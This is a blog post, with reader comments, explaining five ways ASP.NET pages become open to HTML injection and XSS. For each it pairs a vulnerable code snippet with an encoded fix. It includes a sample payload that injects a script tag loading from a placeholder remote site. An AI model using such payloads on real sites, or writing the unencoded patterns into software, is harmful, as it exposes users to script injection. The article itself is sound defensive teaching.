5 signs your ASP.NET application may be vulnerable to HTML injection

If you don’t encode data when using any of the following methods to output HTML, your application could be compromised. Unexpected HTML turning up in the page can do anything from altering the formatting through to capturing and interfering with form data via remote scripts (XSS). Such vulnerabilities are incredibly dangerous.

Using MonoRail or Microsoft’s MVC does not make you automatically immune – use !{ } in MonoRail’s Brail engine and the HtmlHelpers in Microsoft’s MVC to ensure correct encoding.

Just imagine post.Author contains "><script src="http://abadsite.com"></script> because an unscrupulous user entered it into a field your application uses and it made its way into the database. The following typical ASP.NET techniques would leave you open.

1. You use <%= %> or <%# %> tags to output data

Example showing outputting literals with <%= %> :

<%-- Vulnerable --%>
<p>Posted by <%= post.Author %></p>
<%-- Secure --%>
<p>Posted by <%= HttpUtility.HtmlEncode(post.Author) %></p>

2. You use Response.Write

Example showing attributes written out with Response.Write and String.Format; again, post.Author could contain <script>:

// Vulnerable
Response.Write(String.Format("<input type=\"text\" value=\"{0}\" />", post.Author));
// Secure
Response.Write(String.Format("<input type=\"text\" value=\"{0}\" />", HttpUtility.HtmlAttributeEncode(post.Author)));
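
To see what actually reaches the browser in each case, here is a minimal console sketch. It assumes System.Net.WebUtility.HtmlEncode as a stand-in for the HttpUtility calls above so that it runs without a reference to System.Web. The class name is hypothetical, and HttpUtility.HtmlAttributeEncode may escape a slightly different set of characters.

```csharp
using System;
using System.Net;

// Hypothetical demo class, not part of any ASP.NET application.
class AttributeInjectionDemo
{
    static void Main()
    {
        // The hostile value from the example at the top of the article.
        string author = "\"><script src=\"http://abadsite.com\"></script>";

        // Unencoded: the leading "> closes the value attribute and the input tag,
        // so the script element lands in the page as live markup.
        Console.WriteLine(String.Format("<input type=\"text\" value=\"{0}\" />", author));

        // Encoded: quotes and angle brackets become entities,
        // so the whole payload stays inside the attribute value.
        Console.WriteLine(String.Format("<input type=\"text\" value=\"{0}\" />", WebUtility.HtmlEncode(author)));
    }
}
```

The first line printed should contain a real <script> element after the prematurely closed input tag. The second should contain only &quot;, &lt; and &gt; entities inside the value attribute.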

3. You set HRef or Src on HtmlAnchor, HtmlImage or HtmlInputImage controls

In general the controls in the HtmlControls namespace are very well behaved with encoding, but there is a bug in the code that attempts to adjust relative URLs for href and src attributes, which causes those properties to bypass encoding (I’ve reported this to Microsoft).

Example showing anchor HRef attribute abuse:

// Vulnerable
outputDiv.Controls.Add(new HtmlAnchor() { InnerText = "Test", HRef = post.Author } );
// Secure
outputDiv.Controls.Add(new HtmlAnchor() { InnerText = "Test", HRef = HttpUtility.HtmlAttributeEncode(post.Author) } );

4. You set the Text property of WebControls/WebForms

You would imagine the high-level WebForms controls would take care of encoding, and you’d be wrong.

Example showing the Label control being so easily taken advantage of:

// Vulnerable
outputDiv.Controls.Add(new Label() { Text = post.Author } );
// Secure
outputDiv.Controls.Add(new Label() { Text = HttpUtility.HtmlEncode(post.Author) } );

The one exception to this is the Text property of input controls – as they put the value into an attribute and therefore call HttpUtility.HtmlAttributeEncode for you.

5. You use the LiteralControl

LiteralControl is a useful control for adding text to the output stream that doesn’t require its own tag. It also helpfully, and uncharacteristically, provides a useful constructor. Unfortunately it fails to encode the output.

Example showing the poor LiteralControl left wide open:

// Vulnerable
outputDiv.Controls.Add(new LiteralControl(post.Author));
// Secure
outputDiv.Controls.Add(new LiteralControl(HttpUtility.HtmlEncode(post.Author)));

Do not:
  1. Encode data in the database – your contaminated data will be difficult to use elsewhere and will end up double-encoded
  2. Look for script on submit – you won’t catch every combination and it might prevent valid data
  3. Trap entry with client-side code – it is trivially bypassed
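
The double-encoding problem from the first point can be sketched in a few lines. This is only an illustration: it assumes System.Net.WebUtility.HtmlEncode as a stand-in for HttpUtility.HtmlEncode so it runs as a console program, and the class and variable names are hypothetical.

```csharp
using System;
using System.Net;

// Hypothetical demo class showing why encoding belongs at output time only.
class DoubleEncodingDemo
{
    static void Main()
    {
        string title = "Using List<T> for collections";

        // Mistake: encode on the way into the database...
        string storedEncoded = WebUtility.HtmlEncode(title);

        // ...and then encode again at output, as the page should always do.
        string doubleEncoded = WebUtility.HtmlEncode(storedEncoded);

        // Correct: store the raw value and encode once, at output.
        string encodedOnce = WebUtility.HtmlEncode(title);

        Console.WriteLine(doubleEncoded); // Using List&amp;lt;T&amp;gt; for collections
        Console.WriteLine(encodedOnce);   // Using List&lt;T&gt; for collections
    }
}
```

A browser would show the double-encoded value as the literal text List&lt;T&gt;, while the value encoded once displays as List<T>.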

Just encode the output :)

[)amien
(The samples use .NET 3.5 object initializer syntax for brevity as many affected controls do not have useful constructors)

15 responses  

  1. I would love to see some type of shortcut in MVC like Brail has in MonoRail. In Brail I can write !{post.Author} and it will be HTML encoded. It would be nice if MS MVC, and ASP.NET for that matter, added something similar so that encoding did not have to take a function call. Not having this will be so much more annoying in MS MVC as you will have many more code blocks.

    Adam Tybor – December 18th, 2007
  2. !{ } is good in MonoRail. I think Ayende added it in response to my ticket about encoding being off by default, which caused a problem right through to components such as the SmartGrid.

    Having something similar in MVC would be great although personally I’d love it to be mapped to a method on a new HtmlViewPage class which inherits from ViewPage so that you can switch out the encoding method for different output types.

    There is some discussion about the whole issue so we’ll see what happens.

    [)amien

    Damien Guard – December 18th, 2007
  3. I wonder why escaping (or encoding if you prefer) the HTML isn’t the default on the higher-level constructs. I can understand why the low-level ASP output methods don’t do it, but IMO higher level frameworks should always default to safe behaviour. Having to remember to explicitly escape is a huge pain in the ass.

    I know everyone except me reading your blog hates Java, but again JSF demonstrates good practice here, by defaulting to escaping HTML. Since JSF is a common building block for most serious Java web software, the result is that most people building using it will have at least that minimum requirement covered without having to keep reminding themselves. I think the MVC framework, or some intermediate view component for ASP (as JSF is to JSP) should do the same.

    steve – December 18th, 2007
  4. And interestingly, I think shortcuts like !{ have a downside. Sure it’s quicker to type, but it does nothing to remind you that you should be using it. And it’s arguably harder to spot a missing ! when you’re reviewing code than it is to spot a missing explicit encoding/escaping method call. I don’t think shortcuts are the answer at all; making safety the default is much more robust.

    steve – December 18th, 2007
  5. Yeah, I agree with you here and have to concede that JSF/JSP did the right thing.

    Microsoft almost got it right with the HtmlControls but for that bug I found.

    [)amien

    Damien Guard – December 18th, 2007
  6. Great article, I have always encoded entries into the db but never encoded the output from the DB. After reading this I was like “duh!! why didn’t I think of that”. I wonder if someone could make an Ajax extender for a textbox that automatically encodes the output. Thanks again, Scott

    ScottB – December 18th, 2007
  7. So…

    By saying ASP.NET does nothing for you, are you implying that putting a “” section into your web.config isn’t working anymore for some reason?
    It certainly isn’t fool-proof, but it gives a huge head-start getting around the issues you are describing.

    Dave – December 18th, 2007
  8. Lol, I think that WordPress decided that might be dangerous and stripped it. Dave was, I think, mentioning the <pages validateRequest="true" /> option in web.config that tries to prevent your application accepting script from the user.

    This is all well and good but if there are other ways to get data into your database (links with other company systems, web services, message pumps or even internal WinForms apps) then those too can be avenues for attack.

    Many attacks happen from the inside and anyone with access to the SQL box or a WinForms app could be the one putting the payload there ready for your application to deliver up to unsuspecting users.

    [)amien

    Damien Guard – December 18th, 2007
  9. pingback

    [...] 5 signs your ASP.NET application may be vulnerable to HTML injection – which means that you may be vulnerable to XSS attacks too. [...]

    Our daily link (2007-12-18) - Trumpi's blog – December 18th, 2007
  10. But that’s not really 5 signs. It’s really just one sign, because <%= %>, Response.Write, HtmlAnchor et al aren’t the problem. The problem is post.Author. If it comes from a trusted source (i.e., you typed it in yourself), it’s safe to output directly. If it comes from anywhere else (notably user input), then it must be encoded.

    James Curran – December 19th, 2007
  11. It should be encoded regardless of where it came from or whether it is believed to be safe. The only exception is data you expect to contain HTML and are going to sanitize to ensure it only has the HTML you like.

    One example I’ve seen is blogging software that fails to encode blog post titles because they are ‘safe’ in that they are only entered by the blogging author.

    You create a blog post called “Using List<T> for collections” and it shows up with “Using List for collections”, causes the page to fail validation and breaks the RSS feed.

    [)amien

    Damien Guard – December 19th, 2007
  12. pingback

    [...] For more ASP.NET examples check out 5 signs your ASP.NET application may be vulnerable to HTML injection. [...]

    How dangerous is HTML injection? » DamienG – December 19th, 2007
  13. great article, i like the ideas in it
    a kick from me ;)

    Fady Anwar – December 19th, 2007
  14. Damien,
    When you say “You would imagine the high-level WebForms controls would take care of encoding and you’d be wrong”, is there a list of controls that are vulnerable and a list of controls that are not?

    Amit – February 11th, 2009
  15. pingback

    [...] right about something. Don’t HTML encode data that’s stored in your database! Take the good advice of Damien Guard and Joel Spolsky! You can choose to store both representations, but don’t store just the [...]

    Podcast #58 - Blog - Stack Overflow – June 17th, 2009
